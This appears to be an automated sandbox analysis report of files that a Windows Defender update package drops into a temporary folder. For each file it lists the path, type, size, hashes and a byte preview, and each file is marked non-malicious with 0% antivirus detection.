SHA-256:	F7B6EB6E4D8E04C7243AB0AB73CEC6E20E980F07E03267ED4B0CA69CF9CDAB3D
SHA-512:	13184B5DFD5E82C44F1451AD426B7FB8ACE63923679D4210C3B2CACE6691DBACD113E9D55FFB041D1C79C46A80C128EE5D2A97E874487A938DBCF08C03A1C3EC
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............`...`...`..z....`..z....`..&....`..&....`....l..`..&....`..&....`...`...b..z...I`......`..z....`..z....`..Rich.`..........................PE..d................"..........0.................@.............................P.......j............... ..............................................p..........,O...@..@?...@..........p....................J..(....(..8...........@J......8........................text...[........................... ..`.rdata..>.... ....... ..............@..@.data....M.......@..................@....pdata..,O.......P..................@..@.didat.......`.......P..............@....rsrc........p.......`..............@..@.reloc.......@.......0..............@..B........................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpCommu.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	352504
Entropy (8bit):	6.026593673622959
Encrypted:	false
SSDEEP:	6144:yOoa9kPfLM055gj5qDj8qdzRf8IGRx7Ur9opJtwEKLoi7GG75li:yXHjgjELzRf4q9oduLR77i
MD5:	98DE76E6BD6919C81785F34F3E4E4025
SHA1:	9E1BF8C617D7D629623D16DE29889659F4623066
SHA-256:	A5D1C85E15E4454D0CF4E613107F688B540A046659F1DDECA859B395335BD50D
SHA-512:	5F233E59E8C4BB320C5BCD42505300EFEAA519FE35B1877A7213CB471162A1BB613C027FBDB1126FB6E747A704CDE4D799FC4421808819650126D4A9EB282557
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........I...I...I......K......H.......E.......G.......A...@.o.X...I...........e......H.............H......H...RichI...................PE..d....5.}.........." ................`..........f.............................P......n.....`A........................................................0...........,...@... ...@..(...l...p...................H...(.......8...........p...............................text...5........................... ..`.rdata........... ..................@..@.data....#....... ..................@....pdata...,.......0..................@..@.didat..X.... ......................@....rsrc........0....... ..............@..@.reloc..(....@.......0..............@..B................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpCopyAccelerator.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	165576
Entropy (8bit):	5.403399700794782
Encrypted:	false
SSDEEP:	3072:Obc/k/710XdiWNGKTeoKeMK9OQWExQc5W:OIM/72IWb9n9OQWEno
MD5:	B613F7C352DB0471338A01FA7CF94521
SHA1:	04618A6DD7100D957E6B190F70C263F1FF775CAB
SHA-256:	71ABD7C64E51AF9A750A31BAC218F9E6781C913869D97AA4024C2456E101CB20
SHA-512:	0D538585A972252EF6FF99C3ABB8F682201EE33A0FDFADB5BDCBEEE65E38D2C64BF8893B1691276ABF8F44303309BECF89AE0E74C3248609FB93FA22A6CD8F5D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................................F......F.......B....F......F..................................Rich....................PE..d.....J..........."..........P................@.............................`....................... .......................................Z..................<....`...&...P..4....8..p.......................(.......8...........8................................text............................... ..`.rdata...].......`..................@..@.data........p.......p..............@....pdata..<...........................@..@.rsrc...............................@..@.reloc..4....P.......P..............@..B................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpDetours.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	164088
Entropy (8bit):	5.889246599238573
Encrypted:	false
SSDEEP:	3072:LhAcjxmGnxakZmOpjZrppk4sGFO5SVyT+/t5xRbOz8kKbc/3u:LKc4GnQeVaGs5ZgbRk6cG
MD5:	6694C427D876FEEC65126E7734886E88
SHA1:	F6F08ADEEA556B241E4010F538DA7E6C32047628
SHA-256:	A76E653BA8D251379133B748B685C08672A69D1CF95493549E563CFAD8A8D7A5
SHA-512:	620A52BF3D503B82D82799C48A23CF4AA8BD7E399C343192EDB52E28FA6815976C90621D1B2E5EB841B0711F5F4191BFB141529CC341EAA215A8905A65FA0010
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:Q..~0t.~0t.~0t..Ew..0t..Bu.n0t..Bp.r0t..Bw.y0t.wH.q0t.~0u.M1t..Bq.W0t..Et..0t..E}.60t..E...0t..Ev..0t.Rich~0t.................PE..d.....x..........." .........................................................p............`A.........................................................P.......0.......`... ...`......@...p.......................(...`...8............................................text....v.......................... ..`.rdata..............................@..@.data...............................@....pdata.......0... ... ..............@..@.rsrc........P.......@..............@..@.reloc.......`.......P..............@..B................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpDetoursCopyAccelerator.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	102632
Entropy (8bit):	5.416424506292462
Encrypted:	false
SSDEEP:	1536:dnC8TM3nUZtTOwts7XxhrTNCfDgFvFJ2m6K2mPegHPxG:ZTM3UZtTOwW7XTNCfDGdBx2mPeqk
MD5:	50E2C916D6B2E5CDCED1BF18BEF5B9E6
SHA1:	523DA8427550B397352D0C7D9770BBE57E31C5CD
SHA-256:	C880E519887E5AFD35612BDAF4F987D79ED294050A4D291B54B18F7F3C80A89D
SHA-512:	C95F1D480DC1EF5587C9B9CE89F9C58550B2CD7E1E2389DE3A02DFBF541C9BBF66AFEC724767B574C81236FF0F5AE9C25D99702BA76FFC214290536C32BD6F3D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s.v. .v. .v. U..!.v. ...!.v. ...!.v. ...!.v. ..U .v. .v. .w. ...!.v. U..!.v. U..!.v. U.9 .v. U..!.v. Rich.v. ........PE..d...F[.S.........." .................^...............................................j....`A........................................0...H...x........`..X....P.......p... ...p..........p...................h...(...0...8...............0............................text...R........................... ..`.rdata..*W.......`..................@..@.data........0.......0..............@....pdata.......P.......@..............@..@.rsrc...X....`.......P..............@..@.reloc.......p.......`..............@..B........................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpDlpCmd.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	372176
Entropy (8bit):	5.810540726487847
Encrypted:	false
SSDEEP:	6144:SqKvKD0BvxUWJsoyvdnja6lHfF2tZLmiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVi:jyBWGxyvmR1
MD5:	9DA1C405AF787EFBAF735B76388F867F
SHA1:	7C9F2DD2C72A15B2954534BB7021C9DB3F850DA1
SHA-256:	7E7180B5534BE4BF2E531DCCE4BD8C0CB55EEC93759625283A162C0F6149464F
SHA-512:	66190E1EA2D6FA7EE048D204746216B8C8146C0F17114CA1651B566632F32970F2F6113131338D96D43FDCA33A9266D142016DCD6369F27CE6657DF12FB823E5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.8...k...k...k7v.j...k7v.j...kkq.j...kkq.j...k.{sk...kkq.j...kkq.k...kkq.j...k...k...k7v.j...k7v.k...k7v.j...kRich...k................PE..d...V..F.........."..................9.........@....................................y................ ......................................4...@....p.......P..<........-......l...P...p.......................(...`...8...............h............................text...E........................... ..`.rdata...}..........................@..@.data........0.......0..............@....pdata..<....P... ...@..............@..@.rsrc........p.......`..............@..@.reloc..l............p..............@..B........................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpEvMsg.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	143608
Entropy (8bit):	3.8404828233814126
Encrypted:	false
SSDEEP:	768:7r/gwWulQnuBkG22Tumo0cTH6QKqCmuKqrWmNKq4mZKqdmjd4KqgmXyGgR1PRGzm:QIBkG2usKoHPim
MD5:	E6BA4B06A514B05F1A6F67E02776CB12
SHA1:	40CE66816509483AD45B8B6DE05D5F9AC23671CB
SHA-256:	3E69F409180506A6636CA8F0620AB0CC9B57F1393AC5986CC8BBE50BEF12C9C2
SHA-512:	C8DDB425AEA945C86742ED8E8940E655BC24AB66EE4FAEDB7F29FA7A187809DABD326A529777691481E53C55D5119402D4016CDED33919840AC98D9C636C3022
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..d................." ......................................................................`A......................................................... ................... ..............T............................................................................rdata..............................@..@.rsrc........ ....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpOAV.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	495848
Entropy (8bit):	6.009124528357715
Encrypted:	false
SSDEEP:	6144:l7A3ZwUGB8s0MYG75D5DU3b9EV0ShqJULr0XVCOPmiTVVmVVV8VVNVVVcVVVxVVV:lk3a7J5DS9EV0MqJULrkkMo
MD5:	507A1C4DC135D31E60E46C911F518352
SHA1:	94D0E5C74AD632CDE21A967FD6A06999153B6CC7
SHA-256:	07AA7775DEC86AFEF867C3B902BCF47CCB36E224433171EB6C4C0E3D80F753AB
SHA-512:	FD980B28BA5E60536D695707716B4AC5B2AD63EEF1AF82534B326E2DBF6CA349DDA189C70CAF638C2AB6C3D6EB187F3C613FC5097C645C4272D9C60E8E2BE305
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........M...#...#...#.v. ...#.."..#..."..#..'..#.. ...#..&.>.#.v.#...#.v.*..#.v.....#.v.!...#.Rich..#.........PE..d...A............." ..........................._..........................................`A................................................D...x............`...#...p... ......t.......p....................8..(...P7..8............8..p............................text..."........................... ..`.rdata..............................@..@.data....0... ... ... ..............@....pdata...#...`...0...@..............@..@.rsrc................p..............@..@.reloc..t............`..............@..B................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpRtp.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1478904
Entropy (8bit):	6.324410065456569
Encrypted:	false
SSDEEP:	24576:43IcInwFd0DDgUkXbikt2m94TdJdiLyvBW+IYHMb1ie:4YrvDDgsm2mWJdiLiBWZQMb1ie
MD5:	EABFAF1CE6CB8843DA42FBA01E8BF069
SHA1:	ADBD3EF5C4EBD0D395B157489A3B5D34EAB8CFFF
SHA-256:	CA99B8EAA6ED8C706590551BE37107D027BBD53CC9E52805446ADF59B3AEDC1E
SHA-512:	AFF68BBE9B8A086E2E49BDBC864DE8FA8E5990F23F38B385CDEE56C189C52088B24DD492A779EA2ECDD751AB682B81041B674E854DCB190F8EBD10079FC1F68C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........H...)...)...)..M\...)..M\...)...[...)...)...(...[...)...[...)...[...)..M\...)..M\...)..M\W..)..M\...)..Rich.)..........PE..d....t`.........." ...........................^..........................................`A........................................P...d............ ...B...p.......p... ...p......`...p.......................(......8...........(.......4... ....................text....t.......................... ..`.rdata..^V.......`..................@..@.data...<p.......`..................@....pdata.......p.......P..............@..@.didat..X...........................@....rsrc....B... ...P..................@..@.reloc.......p... ...P..............@..B................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	803176
Entropy (8bit):	6.37118649960636
Encrypted:	false
SSDEEP:	24576:Ghj1QlBYDgtUUvie3n+pB3+ojRlcD1VyZTFXk:GhpQlBHtBYla1VyZpU
MD5:	01F92DC7A766FF783AE7AF40FD0334FB
SHA1:	45D7B8E98E22F939ED0083FE31204CAA9A72FA76
SHA-256:	FA42B9B84754E2E8368E8929FA045BE86DBD72678176EE75814D2A16D23E5C26
SHA-512:	BEA5F3D7FB0984C4A71720F25644CE3151FCDC95586E1E2FFE804D04567AAF30D8678608110E241C7DDF908F94882EDDD84A994573B0C808D1C064F0E135A583
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B..#...#...#..EV...#...Q...#...Q...#...Q...#...Q...#...#..."..EV..#..EVN..#..EV...#..Rich.#..........PE..d.....P.........."......`....................@.............................0.......-....`.......... .......................................t..d....... ........D... ..h!... ......d...p.......................(......8...........0................................text...2R.......`.................. ..`.rdata.......p... ...p..............@..@.data..../....... ..................@....pdata...D.......P..................@..@.rsrc... ...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSvc.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3113208
Entropy (8bit):	6.304406527619417
Encrypted:	false
SSDEEP:	49152:RThS41BElO7Jyf4HtxHnXXnh/vz1ztLm0exGP9lbw6ieBh4wBg:nR/EE7ofGx1fFxg
MD5:	0618D6AA4B96E666F1C3B79CA1531187
SHA1:	037AA87516FA27ADAE6499FFE314601262FE8E8A
SHA-256:	89FD82BABFEE76643CA0F3DC4730302575E2BCCB00F744090D9E253A8CD9EE53
SHA-512:	457ECDAF9CC2AB3E6E26F8899831979AC5B1D0D59483CFC30A815280CD362173E0E349F5CC28F45DE25E2AB9DF4731768CF06A0C8E66E595847A67A43833F481
Malicious:	false
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........!.\Z@..Z@..Z@...5..X@...5..[@...2..H@...2..H@...2..S@..S8*.M@..Z@...B...2..j@...2D.X@...5..[@...5..?A..}...]@...5F.[@...5..[@..RichZ@..........................PE..d................." ......"....................\............................../......;0...`A.........................................B,.d....C,.h.......`....p-.d1...`/.. ...P/.h4.../(.p.....................#.(.....".8.............#......;,.@....................text....q"......."................. ..`.rdata........".......".............@..@.data.........,.......,.............@....pdata..d1...p-..@...@-.............@..@.didat..............................@....rsrc...`...........................@..@.reloc..h4...P/..@... /.............@..B........................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpUpdate.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	151800
Entropy (8bit):	5.674686738982597
Encrypted:	false
SSDEEP:	1536:LJ9Z2WHykjzKo81vmwUGKyBA3LTqjSL0fieoeKTePoWQbzkDHP+W:LJ9b3Kd1vm/GymuL0fieoeKTePovbzsT
MD5:	BA4E1FC83B68F72927F58BBFA064C294
SHA1:	F0F57EB79F2478D7BFE4AD4D18361D2F09E3E03A
SHA-256:	23C224794D0342F3C97D6F104B40465A8C314186DD3A9F0CBBC9A9441700AE83
SHA-512:	789D52FF5491488B162422BFB4A6D4FB9D40E905B6A370AD2A9F20BA095B9485D5AF07EB8CD660D2BF4F4906DC1FA68ACD223ACFE913FC5F99F78FBDA56DDCA4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ew9{!.W(!.W(!.W(.cT) .W(.cV)#.W(.dV)0.W(.dS),.W(.dT)&.W((n.(/.W(!.V(q.W(.dR)..W(.cW) .W(.c^)n.W(.c.( .W(.cU) .W(Rich!.W(........................PE..d.... 3".........." ..... .....................h.............................@............`A............................................L...\........ ...............0... ...0......@...p...................xU..(...@T..8............U...............................text............ .................. ..`.rdata..D....0.......0..............@..@.data... ...........................@....pdata........... ..................@..@.rsrc........ ......................@..@.reloc.......0....... ..............@..B................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpUxAgent.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	545016
Entropy (8bit):	5.974310663865527
Encrypted:	false
SSDEEP:	6144:j/zDRgR8KZHQf7uiJRpqVCy6H5gAH2IGCXl/2UWYbyKHiTVVmVVV8VVNVVVcVVVB:7zDRvDp/qVC1gAH2IGCXlPh4S
MD5:	68228D20DFAA033D246B8BED272CF92C
SHA1:	F351C4991FFC3190131B279E06A0F58856EBC375
SHA-256:	C44F961691C4F91AD370985D5EB281F843EB5DCF6F5EC98D9C9A509E789CB7E8
SHA-512:	2B327EB01858A1B7C80275B9F5B3B642592DFE0AD357B3C65D7C483D0CB59178CB33A245408BC0A962F28594B504C0F17521F567A8AD5CA981A770CC9B857916
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>7._Y.._Y.._Y..Z.._Y..X.._Y.Y-X.._Y.Y-].._Y.Y-Z.._Y..'.._Y.._X..^Y.Y-\.._Y.Y-..._Y..Y.._Y..P.._Y....._Y..[.._Y.Rich._Y.........PE..d.....2.........." .................&.......................................0......;......A................................................8........0..\........#...0... ... ...... ..p...................X...(... ...8...............x............................text...%........................... ..`.rdata..x........ ..................@..@.data....-.......0..................@....pdata...#.......0..................@..@.rsrc...\....0.......0..............@..@.reloc....... ....... ..............@..B........................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MsMpEng.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	128392
Entropy (8bit):	5.775533067291842
Encrypted:	false
SSDEEP:	3072:gPkBbbztTh/9kcexTIJO0gj7KTe9q7CTttUSkh6e5:gPIfRh/9kUJDZuttUNse
MD5:	15D205854CA62B75C0BF447F9DD8119D
SHA1:	F1A1874738E310CE76D37C1045EA00C0CEFCF64B
SHA-256:	B815A94D49CC0E8DB03456CBBAFB4A052F481531F8768CE704A2A012FD84B7AB
SHA-512:	A6B324F884525875849994EE2247B98BF3D389A49B4E387A578F05E92FB754CEF6AD917D5CE201A40E88FDAA0A117C6D23EB5B7FEA6F4765F48EE957AB471B85
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-.U.L...L...L..W9...L...>...L...>...L...4...L...>...L...>...L...L...M..W9...L..W9y..L..W9...L..Rich.L..........PE..d....MCD.........."...........................@.....................................N......................................................tj..................\|........%......`....<..p....................$..(...."..8...........@$...............................text...B........................... ..`.rdata...Y... ...`... ..............@..@.data...............................@....pdata..\|........ ..................@..@.rsrc...............................@..@.reloc..`...........................@..B................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MsMpLics.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20728
Entropy (8bit):	4.482228069977977
Encrypted:	false
SSDEEP:	192:7rPEnfKWgFHWaALc2Fu462TNOxjB1RDBQABJpI4BOk9qnajR5d:7rPEniWgFHWa1MJERDBRJpxBhl95
MD5:	7B842DAC975E04C90F9B23B7D04B5160
SHA1:	DE370B7FBC16E36955A700D472BAD83A029F2B52
SHA-256:	61D412008B89D3B931BC9E8AD731F792DD9EF2D2F147916103B8F9392CF8D501
SHA-512:	7D7891BC65B67D9FB9CBA00953A3B86FEFD987EAE2718C79C36B17E1DDAC054A40E3DDE7AF662C8126C2B8440F172C7DF01C24469A8C0D57BD719255BD432F72
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..d....I?.........." ......... ...............................................0......P.....`A......................................................... ...............0... ..............T............................................................................rdata..............................@..@.rsrc........ ....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\NisSrv.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2855512
Entropy (8bit):	6.440503543687848
Encrypted:	false
SSDEEP:	49152:JwgA1BydF9JuPAdoZ6Ig1hUcN2DARtfp+Q4s+W8:JqTi7cW
MD5:	054F919445EDBC999989A1413FD87437
SHA1:	597196C3A4C1CDC1DB5F1A0C39C37CB6C4FC1FB1
SHA-256:	A124EBD9240AAA542962CB2A1059B6315E9F2183CBFD08B4E8029EE15B6A009F
SHA-512:	38C530ABE67F12EEE0A6734CE51FCC24C0CD81AAFD232137A41E221B79FEE9BA07253DA7F50EBEE0E9BFF0FEBCC547C1CCFAE4AE7B222A13B8DC9A3097E2ED50
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h.C............C\|......C\|.......{.......{.......{.......q;..............{.......{U.............C\|..i...C\|W.....C\|......Rich............................PE..d....\k..........."......0#..........]!........@............................. ,.......+...`...................................................(.,.....+.H....`..P....+.X.....+..0.. .$.p...................h.#.(...0.#.8.............#.0....\|(......................text...?'#......0#................. ..`.rdata...i...@#..p...@#.............@..@.data...@.....(.......(.............@....pdata...P...`..`...P).............@..@.didat........+....................@....rsrc...H.....+....................@..@.reloc...0....+..@....*.............@..B................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Powershell\Defender.psd1 Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	13827
Entropy (8bit):	5.952601509916055
Encrypted:	false
SSDEEP:	384:6B7YQ0ExG5Ju4mSFCsCow7+xPcgGywK85lbkn+uwgGhF887:4YQ0Ec5Ju4mweozx0gGyu5Sn+uDuF8c
MD5:	9346D71D826DC7B6580C6206FD1A272E
SHA1:	21B45677AE39E36928CC1DE58958350CF7B49FE7
SHA-256:	EE3344F2D9FE64E0593B1DCE5FC4743D4891DAA6528A0650C41ED0D3F455D48E
SHA-512:	FD976F99CF3B47D6D9E17CEEBF5322C2F9583FA0F9D65E3C6D5144926911861DA3B4E57BD4E72CF3DBF7826BE5B5EF107BAEEB0C1DDF433BE4020B91D03467C9
Malicious:	false
Preview:	@{.. GUID = 'C46BE3DC-30A9-452F-A5FD-4BF9CA87A854'.. Author="Microsoft Corporation".. CompanyName="Microsoft Corporation".. Copyright="Copyright (C) Microsoft Corporation. All rights reserved.".. ModuleVersion = '1.0'.. NestedModules = @( 'MSFT_MpComputerStatus.cdxml',.. 'MSFT_MpPreference.cdxml',.. 'MSFT_MpThreat.cdxml',.. 'MSFT_MpThreatCatalog.cdxml',.. 'MSFT_MpThreatDetection.cdxml',.. 'MSFT_MpScan.cdxml',.. 'MSFT_MpSignature.cdxml',.. 'MSFT_MpWDOScan.cdxml',.. 'MSFT_MpPerformanceRecording.psm1'.. ).... FormatsToProcess = @('MSFT_MpPerformanceReport.Format.ps1xml').... FunctionsToExport = @( 'Get-MpPreference',.. 'Set-MpPreference',.. 'Add-MpPreference',.. 'Remove-MpPreference',..

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Powershell\MSFT_MpComputerStatus.cdxml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	13946
Entropy (8bit):	5.978353470104296
Encrypted:	false
SSDEEP:	384:PX0m6YBOzHQV80tQEFMxOQhCLyTmSKXElIOhalPvnAQEYhW:v0m6YQzHY80tQpOQYLy6SKkIZFvnAQhU
MD5:	58DF8D38469AF7353B672A6F145994DC
SHA1:	DDC641F88A0B3452366CB920306CC3A90961A3C0
SHA-256:	A63B944CF4FB3DB7F758F7E4D94126ABE99916127E451E0C139D71E94744084A
SHA-512:	67B82A79DB97641976C942C448DF9D99317FF5CDC0BE3A1DB1CCA04C3BB8CE3832238E031D22E06CAE4E8ADD3BAB88CEEE29613680C8F33F197599D786334295
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpComputerStatus">.. <Version>1.0</Version>.. <DefaultNoun>MpComputerStatus</DefaultNoun>.... <InstanceCmdlets>.. <GetCmdletParameters DefaultCmdletParameterSet="DefaultSet">.. .. </GetCmdletParameters>.. </InstanceCmdlets> .. </Class>.. ..</PowerShellMetadata>........ SIG # Begin signature block -->.. MIIhZwYJKoZIhvcNAQcCoIIhWDCCIVQCAQExDzANBglghkgBZQMEAgEFADB5Bgor -->.. BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG -->.. KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCCGKubREngV5EF -->.. DodK5brTAqlkaVHav/M+SkqGWqFKKqCCC14wggTrMIID06ADAgECAhMzAAAIMJFU -->.. sm0DDuykAAAAAAgwMA0GCSqGSIb3DQEBCwUAMHkxCzAJBgNVBAYTAlVTMRMwEQYD -->.. VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy -->.. b3NvZnQgQ29y

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Powershell\MSFT_MpPerformanceRecording.psm1 Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	39934
Entropy (8bit):	5.64362105596826
Encrypted:	false
SSDEEP:	768:yFAwQAuFiCFivo1BWMmr8OGPDKQxV3LqIYQ0Ec5Ju4mweS0+dgGyTi5Sn+UuHA:y14cC4vo1BWMmr8OGPDKQxV3LqY/fSKR
MD5:	CBA32A98D0EC2D6CCCD3306BFF7AD3D2
SHA1:	D8F98682DC20E7AD744DE5208C0A472FCB3A33C9
SHA-256:	B77C1F9B9263345F34FE32EED15BD8E3925D378CAEF5D83FEB49275447BCCED6
SHA-512:	9426238394A6043D1A16E1CDEDA953DBD5C6DF8C7D2DBA3A3F34C3E5F963927A1C9791869E4ACE96F670921827E95D9BAF30544D558C521BD01C0E5AC7CB6F61
Malicious:	false
